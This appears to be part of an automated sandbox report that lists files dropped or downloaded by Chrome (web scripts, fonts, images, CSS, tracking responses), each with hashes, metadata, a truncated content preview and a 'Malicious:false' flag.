                                                                                                          Preview:.PNG........IHDR...2...2......?......pHYs.................sRGB.........gAMA......a....jIDATx..Z.o.....x<..n..%vb.v..$@.N.....y...>.y*..M..Ayj$T.RQ.Rx...J..C.L...-.=...x.Y=K..8.*;..U(.h4.,.....{.?.....2.wd........F%...6W..q}-...7........2>6.Ql.....mInn.>G...,..9..a...b1.....R._~d.3/.=....ep`H...I)(....q..$==],.+.. ...P...Z....z.2]."......1.....5.G.[Z.P0"W.^...'.......jd..!&..u{dhpD.j..%.666dnnA...d.q'.l..b....g..{..K.y..y..4...M.....U...K...-]....zN.S2...e..V..l..i...AI..d.p.x<.DH........MH~~....K.y.KNN......^.......X......~..............d2K....q.LMM.wM:::dss...9s.|.....+....z..b.wL......2kJ...jarb2=3#..}....]..4...dv.#KKK.i.U.xR***....244,3.....U.Ur.=.eltT.....r..n.J...0..U....4l./...Z%.Y...C?9..."k..a..P|...I8...29y..0.5.,..c.........P+....diyA.;'...W!...ICC.n...3..X0##....;*.O.Gz/..J..w...]^^A...=......'...".6m.....r..)ikk.....N...lQ.X..R.0Y..a..U...........$..B..q.p...y).(.."...1T^`d.n...Bc.8...P+.H...`.........(...?.39q.6;7.....
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (4269)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):252926
                                                                                                          Entropy (8bit):5.545946858943552
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:FE3C7071E73ADE95C157C08A0CA2BEA5
                                                                                                          SHA1:95FDE453EA0D26A97BCD5845B899B158B46AC6B8
                                                                                                          SHA-256:DE3AAD7E2169AC6FCCD77F9238568AA955CBDC85B7EB07955F36FD2FCBCDEE8D
                                                                                                          SHA-512:F3423CB085CB73307985F48DA18F619EA578F22C37E93D051406C2BEB1EA4D2D6E866009155A0E95C575A044EA9E404EDFB7A9A8AAC08EB2F5C0CADCB45CA585
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_1p_data_v2","priority":3,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"","vtp_isAutoCollectPiiEnabledFlag":false,"tag_id":4},{"function":"__c
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 100x100, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2358
                                                                                                          Entropy (8bit):7.904359159365551
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:691A5F580EA455C3E962958E30168593
                                                                                                          SHA1:DF82E41ED317AC7846148A706B8F64FD5778E975
                                                                                                          SHA-256:5ED8BB8CC33A19972BC555FA982B0A71351F372B1C965DA86F0C76CAAF088211
                                                                                                          SHA-512:3608AD81FA2E7C9265D30D9FB701DE45D63631868F502C5A2F3DFCEA7C7988C67D7A964BAD5CE45B52F36ABCE221D173696C3EE966C0D19556D38FAF85927F8C
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:RIFF....WEBPVP8 "...P)...*d.d.>9..C.!..K.. ....grj. ....:N.r.fkN|..../k..DS._y.G.U.....v....+..@....._..y..].O.G...?..y...c...W<.J.....m......m.a..........j.....?.....t..c.e....I...2..C.y..ex|.-....L.K....r..q$M..U.........+m;.....).w...."*&...t&...s......?].S......T..Bw...w.....^aId}7...d..+.K.x.Q..........a...iy.Q....|.-.8.jqWOK..s.s.........2..5......#........[..Zt..U5...@1/..q4.Y..-~.+o..|..#.....G....s.~.....<.0....(.Rj..J.Z0*.{.{..D..e.].1(i........N.x....H..(u.s....D..._H....`~.......s.2...eo".g.....T...67.ggG>.f...]O.P>O[].UwH...n.t..QrhF..8.p..|...4...H.&.$./...E....S..s...2{......k....{b.t.G=...7O..*IE.../.Y.?.\..y.Lt...C.#=t...o@.+|.2..'..X..|.....-.n.........LJo.,....1.,.....m.$M|2...HU....z....m.........6...v...?=.[.8.KY.#fHg..h<....4.;n......q.Zv...P5.....+......b.Dh........n..F.j.O7....%...i.L&..E..S...?.c...~.X..<k..r.K.C......#..G.E.E..O..Z..n...N..t.l..+._:..5Y<.e..?.........3.....~...#.l..X..P.....5..Uh...F..U..w
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                          Category:dropped
                                                                                                          Size (bytes):35
                                                                                                          Entropy (8bit):2.9302005337813077
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:81144D75B3E69E9AA2FA3E9D83A64D03
                                                                                                          SHA1:F0FBC60B50EDF5B2A0B76E0AA0537B76BF346FFC
                                                                                                          SHA-256:9B9265C69A5CC295D1AB0D04E0273B3677DB1A6216CE2CCF4EFC8C277ED84B39
                                                                                                          SHA-512:2D073E10AE40FDE434EB31CBEDD581A35CD763E51FB7048B88CAA5F949B1E6105E37A228C235BC8976E8DB58ED22149CFCCF83B40CE93A28390566A28975744A
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:GIF89a.............,..............;
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (53553)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):245728
                                                                                                          Entropy (8bit):5.47183556659378
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:37F6C6A4F3E12B7931F736432A135726
                                                                                                          SHA1:5B0D94016AC3DB1C7DB1E372EEA9DC0054891398
                                                                                                          SHA-256:6F8EC5CD511FB4B96C8B573F86B1A62D8322C0286268EECC224C0AA2F30BE18E
                                                                                                          SHA-512:9FAE27901D39A6E8BAF07B10962AE3794723868FD090F6D8D9119486F9409D9341782B4BB7D8B67E62CE7FFD3A4129DDD22581A5A48F231DE3FB8BDD5F07F7BF
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://assets.squarespace.com/universal/scripts-compressed/common-vendors-stable-61293f01d648eef165fc-min.en-US.js
                                                                                                          Preview:(self.webpackChunkextract_css=self.webpackChunkextract_css||[]).push([[97684],{415611:(e,V,T)=>{"use strict";T.r(V),T.d(V,{YUI:()=>_}),e=T.hmd(e);var m=T(760636);/**.@license.YUI 3.17.2 (build 9c3c78e).Copyright 2014 Yahoo! Inc. All rights reserved..Licensed under the BSD License..http://yuilibrary.com/license/.*/typeof _!="undefined"&&(_._YUI=_);var _=function(){var v=0,u=this,n=arguments,d=n.length,r=function(i,f){return i&&i.hasOwnProperty&&i instanceof f},a=typeof YUI_config!="undefined"&&YUI_config;if(r(u,_)?(u._init(),_.GlobalConfig&&u.applyConfig(_.GlobalConfig),a&&u.applyConfig(a),d||u._setup()):u=new _,d){for(;v<d;v++)u.applyConfig(n[v]);u._setup()}return u.instanceOf=r,u};(function(){var v,u,n="3.17.2",d=".",r="http://yui.yahooapis.com/",a="yui3-js-enabled",i="yui3-css-stamp",f=function(){},g=Array.prototype.slice,A={"io.xdrReady":1,"io.xdrResponse":1,"SWF.eventHandler":1},E=typeof window!="undefined",h=E?window:null,s=E?h.document:null,c=s&&s.documentElement,o=c&&c.className
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (2356), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):2356
                                                                                                          Entropy (8bit):5.270603784564084
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:8CE53E2F88B67E05B5ABA3466DE8BE07
                                                                                                          SHA1:98A6016346A586057FDC84E3BCABECFEED43B59F
                                                                                                          SHA-256:8E815DE943351493B2D3859DA2D958F71F6D7E46D7BA2AED29FB6D2BC0C2B08A
                                                                                                          SHA-512:D71661F9C4EFBE176166E0DA6680C305A1524D4C20578AF1C413CB966E48651358E7C28D9DA498CDCC7CBCAE70038263BF4AC8B95EBDB4AC44BB820731257684
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://assets.squarespace.com/universal/styles-compressed/user-account-core-b6e8cafbf34b05da5c2b-min.en-US.css
                                                                                                          Preview:@keyframes shiver{0%{transform:translateX(0)}25%{transform:translateX(11px)}75%{transform:translateX(-11px)}to{transform:translateX(0)}}@keyframes shimmy{0%{transform:translateX(0)}50%{transform:translateX(-33px)}to{transform:translateX(0)}}@keyframes spin{0%{transform:rotate(0deg)}to{transform:rotate(1turn)}}@keyframes bounceIn{0%{opacity:0;transform:scale(.3)}50%{opacity:1;transform:scale(1.05)}70%{transform:scale(.9)}to{transform:scale(1)}}@keyframes pulseBadgeOpacity{0%{opacity:1}85%{opacity:.6}to{opacity:1}}@keyframes fadeout{0%{opacity:1}to{opacity:0}}@keyframes riseandfadein{0%{opacity:0;transform:translateY(22px)}to{opacity:1;transform:translateY(0)}}.WuRfX62D7QUY_ey22tAh{animation-duration:.2s;animation-iteration-count:1;animation-name:shiver;animation-timing-function:cubic-bezier(.175,.885,.32,1.275)}.jBivFIynF43lS6gvvBQm{animation-duration:.1s;animation-iteration-count:2;animation-name:shiver;animation-timing-function:cubic-bezier(.175,.885,.32,1.275)}.VylWTk0OlOPkpwJUK6XN{a
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Web Open Font Format (Version 2), CFF, length 25784, version 1.0
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):25784
                                                                                                          Entropy (8bit):7.991228424942683
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:
                                                                                                          MD5:0AC8F2B850B81F64ADF5DC99EA69F4E7
                                                                                                          SHA1:024FAD446BA0F6EC9E81FD9E907AFBA200BF0968
                                                                                                          SHA-256:D6EED126D50105D83B655BF6D603B8CDCC15AC41267919F6B3424993F58EAD70
                                                                                                          SHA-512:2761ACABDA2DD5F6E867E77890C3EA7F8719403660178DC009390013C0A3C7ED24E627B690C1FDC97148103CDF071E2C24E868D821C7DCE381E49AF6105C713C
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://use.typekit.net/af/099a41/00000000000000007735cc6d/30/l?subset_id=2&fvd=i7&v=3
                                                                                                          Preview:wOF2OTTO..d.......z...d^............................?DYNA.Y.\?GDYN.i..~.`..F.6.$.......). ..ze.T.j1..T.2!.^5 ~.....d.}.../.... +..;....[.A...`...E.......kcuE;e.....H........!."....l. ...lon.........6.<.y{.u..0@Yg)F.K..^V<....n.'Dpv..y.b.$.......Ri...ZhI..5m.B..B.BW..n.(.Rv.m.{&...?Os...:.3..y.2o2...Nw.U..)T....B.d"X....Zq]i./...Wx.q..O...S.....R:.)":5.s..3.<...;..W....|.....|'L....._.P.*Cte+M....{....D&.2Qd.....w{.}^..N.g....!..%.3.x_x/.FVd...e...I.......A.9.S.s..eu@l{...!.".@...-A..P}......2.p...z..n..K..`..)~d...z*.?..d.J.u.d.$.......gcsKN..#A...8h..k..1t.....(.z......)_.N.....=[....t..{d.z....>...Q.[....=.o.Q#..NE.5..%...$D...|T..jAw..;....(3.49]....{%T.....j.......z.....t...u..^.7mLo3.,2..Js.\3om.[.6..m.;....b.../.[.9jX.. _P8................a..a.3....7.....H.H...C$..8.....rX..b=l.G..^....?.w..b].+..n............>Q5.N5.&....Q+ZH+h%...t...1:N'..]...5....s.......z.[r;n.3x&..e....:^..x#o...O.S~.....|./....~.....y~._....n]n.n=n..>s...W.?..r
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):143850
                                                                                                          Entropy (8bit):5.600324902250677
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:63234E3BFC1BA0BB1C24D2CFC13DA897
                                                                                                          SHA1:38960E1CE3A38C87CDEFC93D522303D9BF688885
                                                                                                          SHA-256:CA35ADCE9F2267B57E7AD4E2A36E193329221AE902BB052736DE8CCEC4BFB706
                                                                                                          SHA-512:606FE7A84F188AD951374A71E4A6C3CFADD050F060E2DBB1530F45B908C0E3014F573FD0472C77B1A19044FA9BBA11A22F78B5A25612D340942E504CBC3A7F4C
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://assets.squarespace.com/universal/scripts-compressed/user-account-core-f73e952aa5587a0638fd-min.en-US.js
                                                                                                          Preview:(self.webpackChunkextract_css=self.webpackChunkextract_css||[]).push([[73657,88978,26163,92848],{221006:(m,t,e)=>{"use strict";e.r(t),e.d(t,{anonymize:()=>l,consent:()=>v,event:()=>E,getCurrentSessionURL:()=>D,identify:()=>T,init:()=>k,isInitialized:()=>R,log:()=>y,restart:()=>P,setUserVars:()=>N,setVars:()=>C,shutdown:()=>F});function c(w,A){var S=Object.keys(w);if(Object.getOwnPropertySymbols){var I=Object.getOwnPropertySymbols(w);A&&(I=I.filter(function(Y){return Object.getOwnPropertyDescriptor(w,Y).enumerable})),S.push.apply(S,I)}return S}function n(w){for(var A=1;A<arguments.length;A++){var S=arguments[A]!=null?arguments[A]:{};A%2?c(Object(S),!0).forEach(function(I){o(w,I,S[I])}):Object.getOwnPropertyDescriptors?Object.defineProperties(w,Object.getOwnPropertyDescriptors(S)):c(Object(S)).forEach(function(I){Object.defineProperty(w,I,Object.getOwnPropertyDescriptor(S,I))})}return w}function o(w,A,S){return A in w?Object.defineProperty(w,A,{value:S,enumerable:!0,configurable:!0,writa
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1504
                                                                                                          Entropy (8bit):4.301501410108946
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:B4111D662E5B1DD4757BA2ADA7F7D156
                                                                                                          SHA1:4A15558DB7E1D1136B7153DEAAEDC0D705F71CF2
                                                                                                          SHA-256:1673C45189FFEE5B08A6AE316E965CC63634C113E2F8C8C8451B0C7D97ABF0CA
                                                                                                          SHA-512:030715D7B7032A760C59D39DC4AD35F5B43843F1FF56295F4B0939B83CF0D488707A4F6549F9ABA0ECD2356356D0BB3128C9B3DF809EDA87965F1426E82AF881
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.made-in-china.com/faw-store.html
                                                                                                          Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <title>FAW-store</title>....</head>..<body>.. <script>.. (function() {.. var map = {.. setItem: function(key, value) { window.localStorage['setItem'](key, value); },.. getItem: function(key) { return window.localStorage['getItem'](key); },.. removeItem: function(key) { window.localStorage['removeItem'](key); }.. };.... window.addEventListener('message', function (e) {.. try {.. var method = e.data['method'];.. var key = e.data['key'];.. var value = e.data['value'];.. var id = e.data['id'];.... if (!method) return;.. // ........... var result = map[method](key, value);.. // ..... client ..... var response = {..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (17167)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17172
                                                                                                          Entropy (8bit):5.324375552370105
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:B20B670309C3117280E886A1E87EC98F
                                                                                                          SHA1:795651584AF6B15E95912177E9C0FC5E3802A9DF
                                                                                                          SHA-256:B19DC0B1016079EC84EE3C1B463DAF588B6A038DAAB0320EEF39FC488FEE61EE
                                                                                                          SHA-512:4EC86EDDD905407CBD22992AC453664EE8441BDBA39CD83AF766CA5AD827DCF3FB6532F98B6424F042DFDF1F7CC473E1396ACD18E408A0D16D1EFD970E8CA3A5
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:(function(){var initialUsersnapFeedbackConfig={"bubble": {"text": {"ar": "As a valued user I\u2019d like to invite you to test our new feature.\n\nPlease let us know anything that comes to your mind and be as honest as possible. Your feedback is crucial in helping us improve. ", "cs": "As a valued user I\u2019d like to invite you to test our new feature.\n\nPlease let us know anything that comes to your mind and be as honest as possible. Your feedback is crucial in helping us improve. ", "de": "", "en": "As a valued user I\u2019d like to invite you to test our new feature. Please let us know anything that comes to your mind and be as honest as possible. Your feedback is crucial in helping us improve.", "fr": "As a valued user I\u2019d like to invite you to test our new feature.\n\nPlease let us know anything that comes to your mind and be as honest as possible. Your feedback is crucial in helping us improve. ", "hi": "As a valued user I\u2019d like to invite you to test our new feature
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2022:01:05 13:16:34], baseline, precision 8, 50x50, components 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23678
                                                                                                          Entropy (8bit):7.008680058127726
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:5AA5991CEEC99CA4B0F0AF24B2A223F5
                                                                                                          SHA1:881F16062527E81FC4639EA07F8394F5A1522AA4
                                                                                                          SHA-256:F64EE9A0A7486697DEBD96A031CA2A6A56AE8D79D9FF40B93FF7ECF35B84949F
                                                                                                          SHA-512:B248B6E1827EA3112D759F377339AF9751228D10691698674B8349F02FBB0FBCB8157F5DEF048D8A663F7496B80C4DD648E9BA54A8AA4113D0256BECA7839FB6
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop CS6 (Windows).2022:01:05 13:16:34..........................2...........2...........................................&.(.........................................H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch....
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (4456), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):4456
                                                                                                          Entropy (8bit):4.932991570937558
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:0D584556231449C7765E362BF52A4939
                                                                                                          SHA1:67022EE432FE6C606784EFC29E8545C87937F213
                                                                                                          SHA-256:FF748AEAC58B8440384D50EFE8F8B62ABBB7564D384170FB18D664644DD8CDF2
                                                                                                          SHA-512:6D39EC04028607C986F9E1376E4D2D480682E334EAF7CF9BF1ED5D401DD620E8B268B5633856932772C2B8A8E5FB91F929B53F3EC806C8E45FCF54B64C38E8E3
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://webim.made-in-china.com/super-tm-icon/static/css/icon.5c198418.css
                                                                                                          Preview:#webtm-wrapper{bottom:0;color:#777;font:12px/1.3 Tahoma,simsun,sans-serif;position:fixed;right:70px;z-index:999}#webtm-wrapper dd,#webtm-wrapper div,#webtm-wrapper dl,#webtm-wrapper dt,#webtm-wrapper form,#webtm-wrapper h1,#webtm-wrapper h2,#webtm-wrapper h3,#webtm-wrapper h4,#webtm-wrapper h5,#webtm-wrapper h6,#webtm-wrapper ol,#webtm-wrapper p,#webtm-wrapper ul{display:block}#webtm-wrapper h1,#webtm-wrapper h2,#webtm-wrapper h3,#webtm-wrapper h4,#webtm-wrapper h5,#webtm-wrapper h6{border:none;color:#777;line-height:100%;font:12px/1.3 Tahoma,simsun,sans-serif;font-weight:400}#webtm-wrapper blockquote,#webtm-wrapper button,#webtm-wrapper code,#webtm-wrapper dd,#webtm-wrapper div,#webtm-wrapper dl,#webtm-wrapper dt,#webtm-wrapper fieldset,#webtm-wrapper form,#webtm-wrapper h1,#webtm-wrapper h2,#webtm-wrapper h3,#webtm-wrapper h4,#webtm-wrapper h5,#webtm-wrapper h6,#webtm-wrapper input,#webtm-wrapper legend,#webtm-wrapper li,#webtm-wrapper ol,#webtm-wrapper p,#webtm-wrapper pre,#webtm-wr
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):13
                                                                                                          Entropy (8bit):2.7773627950641693
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                          SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                          SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                          SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://td.doubleclick.net/td/ga/rul?tid=G-VEFCZRQMG4&gacid=1788950988.1728320974&gtm=45je4a20v876016506za200zb6376862&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101533421~101671035~101747727&z=721361046
                                                                                                          Preview:<html></html>
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 27 x 46, 8-bit/color RGB, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):61
                                                                                                          Entropy (8bit):4.035372245524405
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:880EDCA4AD1521930D5827CD1AB42EA6
                                                                                                          SHA1:E1064A49651E33AD793076ABE315ADA814E376A5
                                                                                                          SHA-256:0341BA51756F6B7A9B80035B0337EECC961927D69881B3D661050A63C5D34946
                                                                                                          SHA-512:25278514B03FAB793E5002B4E9C653205526B4A2C999191165F44BDD2F5CE82BCC9EE773B62D508C6B010DD0AE51C729BBBABA0580828416DEC60C2F7D250318
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.PNG........IHDR.............V.......IDAT.....$.....IEND.B`.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (7601)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1196442
                                                                                                          Entropy (8bit):5.1035903434727325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:850267DB771BB0D73B078A69C0E515F5
                                                                                                          SHA1:A7A0E12E74981239191E016672FAA47BC1C29245
                                                                                                          SHA-256:94749A9A2A419C6962EA8C3634AEE02DA5FC8FC73054DC956EEADF710EC90BD5
                                                                                                          SHA-512:B814669A6CC3733BD8EC523083D9413B4A2638F113A09DAB321AFC39D67C4553ECDCE575FBD9740E61DE3DE6A8F695BE0AE90075DCBBCB245A3FCAF03EB7E046
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:(self.webpackChunkextract_css=self.webpackChunkextract_css||[]).push([[80276,59612],{459612:(W,u,t)=>{var a=W.exports=t(619015);a.tz.load(t(379210))},619015:function(W,u,t){var a,b,o;//! moment-timezone.js.//! version : 0.5.44.//! Copyright (c) JS Foundation and other contributors.//! license : MIT.//! github.com/moment/moment-timezone.(function(p,O){"use strict";W.exports?W.exports=O(t(545334)):(b=[t(545334)],a=O,o=typeof a=="function"?a.apply(u,b):a,o!==void 0&&(W.exports=o))})(this,function(p){"use strict";p.version===void 0&&p.default&&(p=p.default);var O="0.5.44",A={},d={},n={},i={},L={},T;(!p||typeof p.version!="string")&&n0("Moment Timezone requires Moment.js. See https://momentjs.com/timezone/docs/#/use-it/browser/");var Y=p.version.split("."),D=+Y[0],p0=+Y[1];(D<2||D===2&&p0<6)&&n0("Moment Timezone requires Moment.js >= 2.6.0. You are using Moment.js "+p.version+". See momentjs.com");function h(r){return r>96?r-87:r>64?r-29:r-48}function Q(r){var l=0,f=r.split("."),R=f[0],X=f[
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1973
                                                                                                          Entropy (8bit):7.598496459860395
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:6F9B31F214C5A32FE4E8F3E5A3016868
                                                                                                          SHA1:307839C1F23477419F48EBB1C7AA4A5DC42DC1CA
                                                                                                          SHA-256:BA4ABD01D75B8E151C7B8E316969247405A38E72B2E3385BD99C133900B70E59
                                                                                                          SHA-512:A20D48404877660807C7706B4CE93460CEF1978F42139D7E7C9F0D44712A56D038E2F896F9CC294E11E9B8C29CF95C98F368E7E7ADF9484AC3E051E9B0839DAC
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://pic.made-in-china.com/61f54j00AtaEQFIJITiE/China-Machinery.jpg
                                                                                                          Preview:......Exif..II*.................Ducky.......U......Adobe.d.................................................................................................................................................2.2............................................................................................!..1A"b#34.Q.T.V........................!1a..A.Qq...."2...BRS..............?..."Q...D.%.(.D\+..$...,x.:.0.|..U..w"E.E.1 .jMPb.%..`U....B.u...6u.a..l\...~..~N..f..8`....Xn..s..'.(....p..g.!....z.3dW..h,.E.P..J.P...".[VZ.].D.(..XHc...V.>j..f...g...O..:.....D.-..{.i.c.YF...\.f`.,..<x.W....3..NB.k.t.......DZzn..q...@..Y........S...F.w 7.ys?......Q....V......&...K:...CJ@ .....U.O.|m.So..U2..X..b.v..z)...w1.........Q.8.U....Kq.=.y"..k...T.Lc...0....l.k."...w...(..OWp=......-..7;.Av...R..e[x.[[0C;...U.....n.07.b../..#e..{..*.v..M#"u....e.I...y.../m@k...P..*.*B..v.D7..;.kzUj.F122././}6Ro!K....e...JrL......o....n....M...7...2..S.8....R.Fx...U...EN..e.re..N...1<a...
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Web Open Font Format (Version 2), CFF, length 25044, version 1.0
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):25044
                                                                                                          Entropy (8bit):7.990237512630354
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:
                                                                                                          MD5:F83C14A950FF8C41A4A34201FBFB033D
                                                                                                          SHA1:DD22100F02F6A1F8A8BE8C6FE95C0D23B71CD32E
                                                                                                          SHA-256:D1E9ED1F8EB15A59515C934950126BAA164F9A4F9B2B4AEBFBD0D3C399CDC962
                                                                                                          SHA-512:4FDC4557A065CA433456FF88B0EB4D0B451FFC8EE5796458C62746059B795A00F19957B9702DEDE23238BD165887FF9FDC48A1612E006A309E98979D4A096AEE
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://use.typekit.net/af/c21f50/00000000000000007735cc6a/30/l?subset_id=2&fvd=i4&v=3
                                                                                                          Preview:wOF2OTTO..a.......y...ay...........................O?DYNA.Y.\?GDYN.i..T.`..F.6.$.......5. ..xu.T.j/..TU...j@.......~.yTRm.t......"...}..n^.c....Y.xV...t..K.)U.J...$..M#...B... ..(*.O..+.+..+m.?...i..N(.d.V.C.b..+.q.JB.A.X\k&T\.-..~.t.?!..#...u4&;..p...(..!.,+."6..HM.%.B.Ih5.f.....".`)e..._.gx...{...[.!...}&.YK]h}@..`1.\.<X.f...)U....v....?F.T.#'..uH../%.r.@F.-..K...Hr.Av...~;..<..{...MLG.m..X3iG.....!...?..eD.....-.I{.n...cW=@........_....}.....+...'v>..f.........y....Vep...6)......QU!.CNV...D..0.....}>0..b#....),CH).J...jP...{d..C...z.\.m.O...A.N...0~.Y#........K.dB.~.dB.,...G..=...R.".....^._....w..t..S..Y...fl.4S...S....r.n.....k.^.:..n..m.'...:.......:.$Rz)..........".R...dc.T..?.O#.xe.4.ZqV...U..e..y.|ve....n..N.$wv:'...M..7.W...U.*...j...f..j.Z.V.....K.N.u.z~3..?......K..A..bP).......uV.Mg.yt.]V..UuO=]..3.,.R.....Ix*<.......9!..<P.JAsh.m..........x.O.)<.....a1....9..6..{`O..q0...8.7.9.J.....R.*E.2..Q4.&..ZC......t.n.M......I...p-n..17....q
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
